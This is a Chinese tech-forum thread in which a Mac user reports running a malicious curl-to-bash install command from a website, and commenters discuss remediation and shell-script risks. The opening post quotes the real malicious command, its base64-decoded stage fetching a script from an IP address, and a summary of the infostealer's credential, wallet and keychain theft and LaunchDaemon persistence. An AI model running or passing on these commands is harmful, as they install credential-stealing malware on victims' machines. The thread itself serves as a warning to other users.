趁周末没事折腾了一下自己的 Mac ,下了一堆乱七八糟的软件
刚刚有个网站给了我一个命令,要在终端执行。命令是 /bin/bash -c "$(curl -fsSL shoter.org/c/maxx2)"
感觉是熬夜脑子不清醒了,我真就傻乎乎输入密码执行了脚本,听到 mac 一阵叮叮钉钉的提示音才感觉不对劲
看了一下这个命令实际执行的是 echo "Y3VybCAtcyBodHRwOi8vMTg1LjkzLjg5LjYyL2QvYm9zczU0MjM1IHwgbm9odXAgYmFzaCAm" | base64 -d | bash 会对应执行 http://185.93.89.62/d/boss54235 这上面的脚本
看到这个命令的时候,脑子都凉了,把脚本喂给 Gemini 告诉我说会去执行以下命令
-
窃取密码 🔑 它会弹出一个伪造的系统对话框,谎称“需要安装应用助手”,诱骗你输入电脑的开机密码。如果你不输入正确的密码,这个对话框会一直骚扰你。
-
窃取加密货币钱包 💰 (主要目标) 浏览器钱包: 它有一个庞大的列表,专门扫描并窃取数十种加密货币钱包浏览器插件的数据,例如 MetaMask 、Phantom 、Trust Wallet 等。
桌面钱包: 它还会扫描并窃取你电脑上安装的桌面钱包程序数据,例如 Exodus, Atomic, Ledger Live, Coinomi, Electrum 等。
- 窃取各类浏览器数据 🌐 它会攻击市面上几乎所有的主流浏览器( Chrome, Safari, Firefox, Edge, Brave, Opera 等)。
窃取内容包括:保存的登录名和密码、Cookies (可以用来登录你的账户)、历史记录、信用卡信息等。
- 窃取个人敏感文件 📄 钥匙串 (Keychain): 复制你整个系统钥匙串文件,里面可能包含你的 Wi-Fi 密码、应用密码等。
备忘录 (Notes): 提取你“备忘录”应用里的所有文字内容。
本地文件: 扫描你的“桌面”和“文稿”文件夹,专门寻找 .pdf, .docx, .txt, .wallet, .key 等敏感文件并进行复制。
- 打包上传,发送给黑客 📤 它会将以上窃取到的所有信息打包成一个 .zip 压缩文件。
然后将这个文件上传到黑客的服务器( IP 地址为 185.93.89.62 ,和你之前那个脚本是同一个地址)。
- 植入后门并替换正常程序 🚪 持久化后门: 它会用你输入的密码,在系统里创建一个启动守护进程 (LaunchDaemon)。这意味着即时你重启电脑,这个恶意软件也会自动运行,让黑客可以持续控制你的电脑。
程序木马化: 它会尝试用一个从黑客服务器下载的恶意版本来替换你电脑上正版的 Ledger Live 加密钱包应用。
这个是不是只能重装系统了?我还要做什么来保护自己的账户吗
 |
1
neetz OP 虽然我没有加密钱包之类的东西,但是是不是浏览器存储的钥匙串密码已经全被拿走了?
|
|
2
neetz OP ➜ ~ vim .pwd
➜ ~ vim .username ➜ ~ ls -l /Library/LaunchDaemons/ total 88 -rw-r--r--@ 1 root wheel 485 10 月 19 03:47 com.22622.plist -rw-r--r--@ 1 root wheel 8012 10 月 19 03:49 com.77686.plist 照着 gemini 确认了一下...确实钓鱼脚本被我执行成功了... |
 |
3
moudy 4 天前  1
有一说一, /bin/bash -c "$(curl xxx)”这种指令真的是太扯蛋了。竟然在 mac 和 linux 上普遍使用,实在是无法理解。
|
 |
4
dilidilid 4 天前
keychain 泄漏的话没啥好的方法,不过现在重要的账号都是动态验证码吧,所以我一直不理解把重要账号的 OTP 密钥保存在 keychain 是什么心态,我只会在手机离线 App 上保存 OTP
|
|
5
dilidilid 4 天前
@moudy 因为对于普通用户就不应该使用 Terminal ,这本来就是给开发者和专业用户的用法,普通用户只应该运行官网下载和以及 App store 里的软件。非要这么说的话 Windows 上让你打开 powershell 运行某个远程脚本 run as administrator 连密码都不需要输入,点个 yes 就能把敏感信息直接打包带走呢
|
|
6
neetz OP 先把常用的账号密码全改了,剩下的睡一觉起来再说...
真的是脑子抽风了,如果是下载 Windows 要我执行 vbs 脚本我肯定理都不理它,偏偏 mac 很多软件都是通过 brew 执行 shell 脚本安装的,大半夜完全没反应过来😭直到执行完了才意识到要检查脚本内容 还好我不玩虚拟货币,看起来这个脚本内容主要目标是这玩意。希望泄露的信息最多被用来撞库啥的 |
 |
7
MacsedProtoss 4 天前 via iPhone
@moudy 你在搞笑吧,你是开发者吗? curl 都不让用?你可以直接审查下载下来的脚本,你看到这个指令可以选择不直接执行而是先下载那个脚本下来自己看看再运行。他就是分两步先用 curl 把 sh 脚本拉下来再 bash 来执行罢了
|
|
8
MacsedProtoss 4 天前 via iPhone
@neetz 重点在于它要求你输入密码这一步,一般这个时候要高度警惕,通常并不需要密码才对,有了密码那就可以提权才能做大部分东西,否则默认访问沙盒或者访问 keychain 之类的应该都是没权限的,偷不了太多(唯一要注意的可能是 ssh key 这种没加密码的话挺危险)
|
 |
9
Crump 4 天前
这种案例我见过好多次了,大部分都是折腾盗版软件的稀里糊涂就被坑了,如果不是那就说明你真的是闲得慌瞎折腾。剩下的就是该改密码改密码,系统重装。
|
 |
11
Cooky 4 天前
不明不白的折腾就得加小心,win 下用沙盘,linux 下用 docker
|
 |
13
avrillavigne 4 天前
被包含于: Online Malicious URL Blocklist
 |
 |
14
ysc3839 4 天前 via Android
先重装系统,再改密码,不重装就改还有可能被盗
|
 |
15
shinecurve 4 天前
我一直以为只要懂点命令行的,不轻易执行这种链接指向的脚本是常识...
|
 |
16
loganovo 4 天前
我连用 homebrew 装东西, 都要先 info 一下, 看看 rb 脚本, 然后再 install 的, 有和我一样的吗;
但是 upgrade 的时候就懒得一一再去看了; 确实没有发现过有恶意的代码, 但是我不愿执行的操作却有一大堆,这时候我都选择手动安装😀 |
|
19
moudy 3 天前
@MacsedProtoss 下载审查后执行是对的。如果能有一个通用的安全检测流程,或者沙盒模拟机制来确认脚本安全性就会好很多。类似 bash-sandbox -c “$(curl ……)”
|
|
20
dilidilid 3 天前 via iPhone
@moudy brew 本来也是给开发者用的,面向开发者的部署本来就需要在安全和效率之间做权衡。针对普通用户的分发渠道是 App Store ,那玩意儿始终运行在沙盒里。你说的模拟对 brew 没啥意义,真投毒的话你不审查代码的话根本查不出来,怎么确认安全性?要么就一直运行在沙盒,那可以用 docker 或者 orbstack
|
|
21
moudy 3 天前
@dilidilid 醒醒,谁告诉你 brew 是给开发者用的。n 多有用的软件你去搜官网都是让你 brew 安装。这玩意就是第二个 appstore 。shell 脚本最终能做的也就那些事。读取敏感文件,安装 daemon ,替换 library 或关键 binary 。行为识别已经能卡住大部分恶意脚本了。
|
|
22
dilidilid 3 天前 via iPhone
@moudy 你说的那 n 多软件基本都是开源软件,开源软件本身就存在更多的供应链风险,你用沙箱测试能规避吗?
我说开发者可能有点极端了,但 brew 确实基本上都是 Pro 用户在用,你可以问问非 Pro 用户买 Mac 的有几个装了 homebrew 。 作为一个佐证,brew 最近一年 install_on_request 事件一共只有一亿次不到,这是包括全平台以及每个包被安装都会计数,homebrew 的 macOS 实际活跃用户估计也就在千万水平,和 macOS 的总体用户规模相去甚远 |
|
24
dilidilid 3 天前 via iPhone
@moudy 你说的行为识别是杀毒软件的需求,Windows 也是默认这么做的,代价就是性能和 IO 耗损以及误杀,这也是很多人抱怨 Windows 文件系统性能差的一个重要原因。mac 平台上的“供应链投毒”显然没有到需要牺牲流畅度去这么做的程度,如果真的特别在意可以在 Mac 上安装第三方杀毒软件
|
 |
25
MYDB 3 天前 via iPhone
1.物理断网
2.抢救一些重要资料(每个文件都自己过目一遍,不要让 AI 帮你) 3.重装系统和软件,如果有 nas 备份可以从那里还原,但系统自带的还原就不要相信了 4.联网,一一修改密码 |
 |
26
aero99 3 天前
Mac 上那个有个防火墙软件忘了名字了,装上可以阻止一部分陌生 ip 访问或者询问
|
 |
27
tamakiui 3 天前 via Android
debian 软件源从来不用考虑这个,第三方软件+sudo 命令行就要警惕了。
|
 |
28
Linioi 3 天前
我一个朋友前几天就是傻乎乎执行了这个脚本,他是被一个 Cloudflare 验证界面骗了,我还笑了他好几天,没想到 V2EX 又撞到一个一模一样的😂
|
 |
29
AoEiuV020JP 3 天前
这真能盗走加密钱包吗, 我看钱包插件之类的都是隔一会儿就要解密才能使用,数据没理由明文保存吧,
|
 |
30
hackpro 3 天前
哪个网站 爆出来避个雷
|
 |
31
EchoJose 3 天前
看来 Mac 破解软件还是得少下载,尽量找开源的。
|
 |
32
gefangshuai 3 天前
好奇心驱使我看到你的帖子后也执行了。。。
到了输入密码那一步我停下了 |
 |
33
whirlcache 3 天前
刚跟着 B 站装了最新学习版的 Lightroom 的我瑟瑟发抖。。。
|
 |
34
nextvay 2 天前
举报下,英国的 IP
|
Select Language